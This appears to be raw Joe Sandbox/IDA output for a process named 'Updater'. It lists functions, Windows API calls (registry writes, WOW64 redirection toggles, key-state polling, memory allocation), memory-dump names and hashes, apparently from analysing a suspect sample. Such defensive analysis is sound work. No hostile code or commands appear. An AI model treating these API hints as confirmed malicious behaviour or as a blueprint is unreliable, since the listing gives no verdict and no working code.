Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b32329fd5f869584e7e238476062817b4402d3707164576baea544c15be74e42
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B031C372A0410ADBE718CF59C4849BDF7A6FB49344B2486A5E909CB356D731EDC1CB90

Function 006E27CA Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E290F: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E291B
Part of subcall function 006E290F: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006E292D
Part of subcall function 006E290F: FreeLibrary.KERNEL32(00000000,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E293F

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006E058E,?,00000001), ref: 006E27FC

Part of subcall function 006E28D8: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E28E1
Part of subcall function 006E28D8: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006E28F3
Part of subcall function 006E28D8: FreeLibrary.KERNEL32(00000000,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E2906

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 30a6bd9423fe49f9a11b369bf202a8a08dbd7fda8a758b7faba4b6a1f5f6b0c0
Instruction ID: e46837f234b0329a41dff92865f2bb7863641ea9a67c3a2dc8ba3f1df9afbf99
Opcode Fuzzy Hash: 30a6bd9423fe49f9a11b369bf202a8a08dbd7fda8a758b7faba4b6a1f5f6b0c0
Instruction Fuzzy Hash: CD112B3161131AAFCB24BF26CC26BAE77ABEF50710F10842EF442961C1EE755E09D754

Function 014B3125 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 014B319E

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: e90c596dc4555caf1ed1208b22abeebb935c4f29df9349ccaf1e98bc4e938338
Instruction ID: 2a165cd4523875dc4b0ca205727f5384df00a5e4babfbc8d5fa4bea05c51d728
Opcode Fuzzy Hash: e90c596dc4555caf1ed1208b22abeebb935c4f29df9349ccaf1e98bc4e938338
Instruction Fuzzy Hash: E7110374E0420AAFDB00DF9AC8818AEBBF8FB58710B51846AFD1497310D770AE11CFA0

Function 00708232 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00708270

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d1dd38fec914ba57d6cf52783b660b3c13d119183af0a18c14b416b8440e7e35
Instruction ID: e0286fc42a3c00dc8a8cec90e5681a0e446a7237a82d0c4f6ccaeb908bf93925
Opcode Fuzzy Hash: d1dd38fec914ba57d6cf52783b660b3c13d119183af0a18c14b416b8440e7e35
Instruction Fuzzy Hash: 371188B590410AEFCB05DF58E94099A3BF4FF48300F104159F808AB341D630EA21CBA5

Function 006FE4A2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d7e353627af878a5162d5d0e6c11f5063cac9a6c49c068a19ae5eb82329a53
Instruction ID: 11622e04f5815e2ca0cb23953ab91c9beebccf82270d30c138cd5ddb048dbdda
Opcode Fuzzy Hash: 67d7e353627af878a5162d5d0e6c11f5063cac9a6c49c068a19ae5eb82329a53
Instruction Fuzzy Hash: A8F0F932501618DAD6313E69CC0DBBB37DA8F41338F140B15FB25971E2DF7AE80286A5

Function 014B850B Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 014B853E

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ba0b235419711254ad6799dc8a94ce1b8adafe9820c639092e7e2ba40df58196
Instruction ID: de0b947b4911091633e1a39948903e5a2625895c2371e44d41714952398b3d00
Opcode Fuzzy Hash: ba0b235419711254ad6799dc8a94ce1b8adafe9820c639092e7e2ba40df58196
Instruction Fuzzy Hash: 2DF03175A01109AFDB10DA9EDCC0AAEBBEC9B69250F044166F918D7261D6719D0187A1

Function 014B850D Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 014B853E

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 2bf5022169675045e15ad5be294524295543f0932f7cb92cbd81f3bd7431cce9
Instruction ID: ca42c505a805c5c372c4b20cac48af82da1ee9ad9b514841ea27aeb479f57c63
Opcode Fuzzy Hash: 2bf5022169675045e15ad5be294524295543f0932f7cb92cbd81f3bd7431cce9
Instruction Fuzzy Hash: 84F03C75A01109ABDB10EA9ADCC0A9EBBAC9B69260F044166F918DB261D67199018BA1

Function 014A22A1 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 014A22D3

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction ID: 036e633c6d937e425a3912c9f2bfb69dd646dea60054b87bff4e5b2e162bb70a
Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction Fuzzy Hash: 16F0A0767001019FCB50EA9DCCC0F9637DC4B7C244B458066B548CB368EAB0CC4497A6

Function 0070282E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 840e92405b73f61521ab704caec2ab29ae66de61116a536ce1163d03b8cad877
Instruction ID: e51f5792ac65b5a58bf85e1c91d0421d3fd64d37f57b24319127a0d74d8a9133
Opcode Fuzzy Hash: 840e92405b73f61521ab704caec2ab29ae66de61116a536ce1163d03b8cad877
Instruction Fuzzy Hash: D0E0E53B100225D6D62136665C0C76B7AC8AF413A0F15C321FD45925E3CA5CCC0381A8

Function 006E283A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad30aac84e3e98822ba437de430b8f0b25f4a2d7abf700f207214490acc997ab
Instruction ID: bf3a8ef9a1982c8ce63f1e0ee09baefed7063cd9888956fc2281a487106592b0
Opcode Fuzzy Hash: ad30aac84e3e98822ba437de430b8f0b25f4a2d7abf700f207214490acc997ab
Instruction Fuzzy Hash: 4EF03071506752CFC7389F65D494826BBEBFF14329310897EE1D786620C7769844DF50

Function 00715FA4 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00715FAF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f0e65d943d2d0ddfee9ce5eaaad801f37448436f8182c6f38ea9bd33bb1644cd
Instruction ID: 9452214c9eb6d79fc251f0be5d8141e48561da89d619e21a317c32e26a2f839c
Opcode Fuzzy Hash: f0e65d943d2d0ddfee9ce5eaaad801f37448436f8182c6f38ea9bd33bb1644cd
Instruction Fuzzy Hash: DCF02BF1F582469AEB304B68DC00BB1FBC5AB00311F10443FE9D5822C1D7B954E0A761

Function 006E28AC Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 006E28CA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
Instruction ID: 5055fcbe9098f922f343373202da91ea020eff40241dba9281453b270fe354fa
Opcode Fuzzy Hash: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
Instruction Fuzzy Hash: D0F0F87240420DFFDF05DF90C941EAABB7AFB15314F208589F9148A212D336EA61EB91

Function 014A1741 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A175F

Part of subcall function 014A19D5: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 014A19F0
Part of subcall function 014A19D5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A0E
Part of subcall function 014A19D5: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A2C
Part of subcall function 014A19D5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 014A1A4A
Part of subcall function 014A19D5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 014A1A93
Part of subcall function 014A19D5: RegQueryValueExA.ADVAPI32(?,014A1C55,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001), ref: 014A1AB1
Part of subcall function 014A19D5: RegCloseKey.ADVAPI32(?,014A1AE0,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1AD3

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction ID: 958b21c4d575445898c41b6100f73bef7f91ccc2d8e20d4aa1141296c08f1cfe
Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction Fuzzy Hash: 8DE06DB9A002158BDB10DE6C88C0A473BD8AB1CB90F410596AD54CF356D370D9108BD0

Function 006EFDB9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006EFDD8

Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: af332bab265141e80688eee06040af357ea30f8fde7d8ba1b41edb386b81f962
Instruction ID: a7b2b194571896738df95b8c7876a8eb7ab72eda2f82d6650aa26725197ba480
Opcode Fuzzy Hash: af332bab265141e80688eee06040af357ea30f8fde7d8ba1b41edb386b81f962
Instruction Fuzzy Hash: BAE08636A002285BC72096989C05FEA77ADDB897A1F0441B6FD09D7244D9A5AC808695

Function 014A3F45 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,014B5B47,00000000,014B7F57,014B80FD,?,c:\,014B80FD,?,c:\), ref: 014A3F50

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction ID: d7bdee560e1348a38a14923140b1b5c5dc7526a5b94ccdd15a40140d9539f696
Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction Fuzzy Hash: C8C08CB42222001F2E14A9BE1CC084A02CC5A3C630BE21A27F0A8D22F2F332C4122820

Function 006E3AA8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006E3AA9

Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B

Part of subcall function 006E4B74: GetCursorPos.USER32(?), ref: 006E4B88
Part of subcall function 006E4B74: ScreenToClient.USER32(00000000,?), ref: 006E4BA5
Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000002), ref: 006E4BE8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
String ID:
API String ID: 4074248120-0
Opcode ID: a27c8f6312b5a34d4aa6621d9d2509a8f0b48f0a007d020334f38bd546ccb7e0
Instruction ID: 4fd0840795a3bbc3bcfd3f0940cddafc03f2db5ef4181f186933cb40b9dbb8f5
Opcode Fuzzy Hash: a27c8f6312b5a34d4aa6621d9d2509a8f0b48f0a007d020334f38bd546ccb7e0
Instruction Fuzzy Hash: DCD05E317013604BC650AB2D9809A593652AB867307144364F4158B3E2CFA85D92CAC9

Function 007102C4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,0071062E,?,?,00000000,?,0071062E,00000000,0000000C), ref: 007102E1

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0a0c7e87f8622d34c1b37ad197122e2469026ff2b8a72c25c51a6a7222ce107c
Instruction ID: 29f4b902dde1b981b466b3330b2fea6a2e28c5dd4b294225197fb5cdb17b5c32
Opcode Fuzzy Hash: 0a0c7e87f8622d34c1b37ad197122e2469026ff2b8a72c25c51a6a7222ce107c
Instruction Fuzzy Hash: F7D06C3211020DBBDF128F84DD06EDA3BAAFB4C714F018000FE1856020C776E821AB94

Function 014A425D Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,014B5B52,00000000,014B7F57,014B80FD,?,c:\,014B80FD,?,c:\), ref: 014A426A

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction ID: 5cc08b2be42853b131a7b84693caf2831722788eb4bad1d6b4d54405039c18e6
Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction Fuzzy Hash: EFB012927513411FFA0035FA0CC1F2E008CD73C50AF910C3BF115CB161D4BBC9041050

Function 00747EFB Relevance: 1.5, APIs: 1, Instructions: 222COMMON

Download Yara Rule

APIs

Part of subcall function 006E1EE8: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,006DC025,?,00008000), ref: 006E1F16

GetLastError.KERNEL32(00000002,00000000), ref: 00748195

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 950c13a96f7afe838c088adb8e3a0dc36511b726d590057e6e82278b309a4006
Instruction ID: 680604c8a19d87abae20bd5c199f30da6d434e9a858ac694e898858697e9c6e8
Opcode Fuzzy Hash: 950c13a96f7afe838c088adb8e3a0dc36511b726d590057e6e82278b309a4006
Instruction Fuzzy Hash: 0A918F30604305DFCB54EF24C491B6EB7E2AF89310F04452EF9965B3A2CB78AD49CB96

Function 0149DC61 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0149DCFA

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ac5bfe8ae694c0c6ecd56124b4a956b73647b01b10d9f6a075c834e78cbab41a
Instruction ID: 3e9a6643d11e805ff0dd9582c97c7269a50c7a47cf649b464003151191841cf5
Opcode Fuzzy Hash: ac5bfe8ae694c0c6ecd56124b4a956b73647b01b10d9f6a075c834e78cbab41a
Instruction Fuzzy Hash: DF21AFB5A082469FCB50CF6CD880A5ABBE0FF98350F14896AF999CB354D330E9558B52

Function 0149DB99 Relevance: 1.3, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 0149DC12

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: f69a1d34edfaff53cc348a64b80329e03754fb9fa6836748120b22c60e942d03
Instruction ID: d314ce7243e59c396429bdaecb1cb18f80a9c9e61948a3617cd2c22959e1197b
Opcode Fuzzy Hash: f69a1d34edfaff53cc348a64b80329e03754fb9fa6836748120b22c60e942d03
Instruction Fuzzy Hash: 5021A2746083429FC720DF5DD484A1AFBE0FB98360F24891EE5E887361D371E884CB56

Function 0149DD21 Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 0149DDB1

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a0981079f91dc71f254180e150275a087ee8f8532c6ed8a233468f05e05a04e9
Instruction ID: 3cb98209587319fae5dc9d1678741a2f335b2921e22af04a3c47e74b9f0982bf
Opcode Fuzzy Hash: a0981079f91dc71f254180e150275a087ee8f8532c6ed8a233468f05e05a04e9
Instruction Fuzzy Hash: B221E0B46053029FCB20CF6CD880A1ABBF0FF89310F244959E594CB368D331E909CB92

Function 014B649D Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 014B6409: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B644E
Part of subcall function 014B6409: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6466
Part of subcall function 014B6409: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6472

Sleep.KERNEL32(00000002,00000000,014B650E), ref: 014B64EE

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
